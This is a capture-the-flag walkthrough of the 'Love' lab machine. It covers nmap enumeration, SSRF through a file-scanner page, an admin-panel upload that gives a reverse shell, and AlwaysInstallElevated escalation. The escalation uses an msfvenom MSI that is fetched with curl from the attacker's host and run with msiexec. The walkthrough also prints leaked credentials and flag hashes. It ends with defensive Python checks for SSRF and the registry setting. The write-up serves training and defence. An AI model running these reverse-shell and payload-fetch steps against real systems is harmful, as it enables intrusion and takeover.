### Enumeration

I performed an Nmap scan and found that several ports are open:

```
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-01 21:23 CEST
Nmap scan report for love.htb (10.10.10.239)
Host is up (0.061s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Voting System using PHP
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
| fingerprint-strings: 
|   NULL, SMBProgNeg: 
|_    Host '10.10.14.201' is not allowed to connect to this MariaDB server
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=5/1%Time=608DAAC6%P=x86_64-pc-linux-gnu%r(NUL
SF:L,4B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.14\.201'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(SMBProgNeg,4
SF:B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.14\.201'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h52m49s, deviation: 4h02m32s, median: 32m47s
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-05-01T12:56:56-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-01T19:56:52
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.80 seconds
```

After learning which ports were open, I opened port 80 in the browser to see what was there and found a voting system on the main site, `love.htb`. In the nmap scan I also noticed the line `commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in`, whose commonName reveals another subdomain, `staging.love.htb`. Opening that in the browser shows a `secure file scanner`, and the site links to a demo of the scanner, a file named `beta.php`, which asks you to `Specify the file url:`. So I tried RFI of some sort, reading a file hosted on localhost on one of the other ports: port `5000` runs another site that shows nothing when I access it from my own machine, but if I put `http://127.0.0.1:5000/` in the input field to scan a file, it does show something.

![](https://i.imgur.com/bhTQNKU.png)

### Gaining Access

From there I got a username and password, and my guess was that they belong to the voting system; the creds are `admin: @LoveIsInTheAir!!!!`. My next shot was to gain access to the voting system, and we did: after running dirsearch I found another directory named `/admin/`, and from there I got in. I tried uploading an image and was able to upload a shell instead, so the admin panel is vulnerable to file upload RCE, and I got a reverse shell! BOOM!!

```
windows-php-reverse-shell [master●●] % nc -lvnp 1234
Connection from 10.10.10.239:60722
b374k shell : connected

Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs> whoami
love\phoebe
```

And we got a shell as phoebe, so now I just go grab user.txt, because phoebe is probably the user :)

```
C:\Users\Phoebe\Desktop>type user.txt
type user.txt
c21311735d9de729263332fe8c495be2
```

Now that I have access, I elevate my privileges. For that I upload winpeas and use it to enumerate for anything that will lead me to root, and in the winpeas results I get `AlwaysInstallElevated set to 1 in HKLM!` and `AlwaysInstallElevated set to 1 in HKCU!`. HackTricks describes a method for gaining root from that privilege, so I create an msi payload, upload it and execute it.

### Elevating Privileges

I created a reverse shell in .msi format, which will be executed with msiexec and give us a shell back; for the reverse shell I used msfvenom:

```
[tahaafarooq@cyberwarriors love]$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.9 LPORT=1337 -f msi -o reverse.msi
```

Then I started a Python HTTP server, downloaded the msi file onto the target and executed it as below:

```
[tahaafarooq@cyberwarriors love]$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.239 - - [04/Aug/2021 15:28:52] "GET /reverse.msi HTTP/1.1" 200
```

```
C:\tmp>curl http://10.10.14.9:8000/reverse.msi -o reverse.msi
curl http://10.10.14.9:8000/reverse.msi -o reverse.msi
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  156k  100  156k    0     0   156k      0  0:00:01  0:00:01 --:--:-- 93801

C:\tmp>msiexec /quiet /qn /i setup.msi
msiexec /quiet /qn /i setup.msi

C:\tmp>msiexec /quiet /qn /i reverse.msi
This installation package could not be opened. Verify that the package exists and that you can access it, or contact the application vendor to verify that this is a valid Windows Installer package.
msiexec /quiet /qn /i reverse.msi

C:\tmp>
```

And from my listener:

```
[tahaafarooq@cyberwarriors love]$ nc -lvnp 1337
Connection from 10.10.10.239:64745
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>
```

Administrator owned!

```
C:\Users\Administrator\Desktop>type root.txt
type root.txt
646ee083ec394900f5808e495c6c616b
```

## {LOVE PWNED!}
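A defensive footnote to the file-scanner step in the enumeration section: `beta.php` fetched whatever URL it was handed, which is why the otherwise unreachable site on port 5000 became readable through it (the server-side request forgery pattern). The check below is an added example, not code from the Love box or its scanner application, showing how a URL-fetching feature can refuse loopback, private and other non-public destinations; `validate_scan_url`, `is_non_public` and the injected `resolve` callback are my names, and the resolver answers in the demo are constructed.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # no file://, gopher://, etc.


def is_non_public(ip_str):
    """True for loopback, RFC 1918, link-local, multicast, reserved or unspecified addresses."""
    ip = ipaddress.ip_address(ip_str)
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_scan_url(url, resolve):
    """Return (allowed, reason) for a URL a 'scan this file' feature is asked to fetch.

    `resolve(hostname)` is a hypothetical callback returning the IP strings the name
    maps to; it is injected so the check runs offline here. The caller should then
    connect to the validated address rather than re-resolving the name, otherwise a
    DNS answer that changes between check and fetch defeats the check.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "URL has no host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL are not allowed"
    # An IP literal (127.0.0.1, [::1], ...) needs no lookup; anything else is resolved.
    try:
        addrs = [str(ipaddress.ip_address(host))]
    except ValueError:
        try:
            addrs = list(resolve(host))
        except OSError as exc:
            return False, "cannot resolve %s: %s" % (host, exc)
    if not addrs:
        return False, "no addresses for %s" % host
    for addr in addrs:
        if is_non_public(addr):
            return False, "%s points at non-public address %s" % (host, addr)
    return True, "ok"


if __name__ == "__main__":
    # Constructed resolver standing in for DNS; the public IP is only a sample value.
    fake_dns = {"example.com": ["93.184.216.34"], "localhost": ["127.0.0.1"]}
    for u in ("http://127.0.0.1:5000/", "http://localhost:5000/", "http://example.com/"):
        print(u, validate_scan_url(u, lambda h: fake_dns.get(h, [])))
```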
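On the privilege escalation: winpeas flagged `AlwaysInstallElevated` as 1 in both HKLM and HKCU, and the combination is what matters, because Windows Installer only honours the policy when both hives set it. The script below is an added example (not from the page or from winpeas) that parses captured `reg query` output for the two Installer policy keys and reports whether the host is in that state; the sample output is constructed and the function names are mine.

```python
import re

# Constructed sample of what a collection script captures from a host by running
#   reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
#   reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""

HIVE_RE = re.compile(
    r"^(HKEY_LOCAL_MACHINE|HKEY_CURRENT_USER)\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\s*$",
    re.IGNORECASE)
VALUE_RE = re.compile(r"^\s+AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9a-f]+)\s*$", re.IGNORECASE)
HIVE_SHORT = {"HKEY_LOCAL_MACHINE": "HKLM", "HKEY_CURRENT_USER": "HKCU"}


def parse_always_install_elevated(text):
    """Map 'HKLM'/'HKCU' to the AlwaysInstallElevated DWORD found under each Installer policy key."""
    found = {}
    hive = None
    for line in text.splitlines():
        m = HIVE_RE.match(line)
        if m:  # key header line: remember which hive the following values belong to
            hive = HIVE_SHORT[m.group(1).upper()]
            continue
        v = VALUE_RE.match(line)
        if v and hive:
            found[hive] = int(v.group(1), 16)
    return found


def assess(found):
    """Both hives at 1 is the exploitable state; one hive alone is not, but is still worth removing.
    Remediation is the GPO 'Always install with elevated privileges' under Windows Installer,
    in both Computer Configuration and User Configuration."""
    hklm, hkcu = found.get("HKLM", 0), found.get("HKCU", 0)
    if hklm == 1 and hkcu == 1:
        return "VULNERABLE: AlwaysInstallElevated is 1 in HKLM and HKCU; any .msi a user runs installs with SYSTEM privileges"
    if hklm == 1 or hkcu == 1:
        return "WARNING: AlwaysInstallElevated is 1 in only one hive; disable it anyway"
    return "OK: AlwaysInstallElevated is not enabled"


if __name__ == "__main__":
    print(assess(parse_always_install_elevated(SAMPLE_REG_OUTPUT)))
```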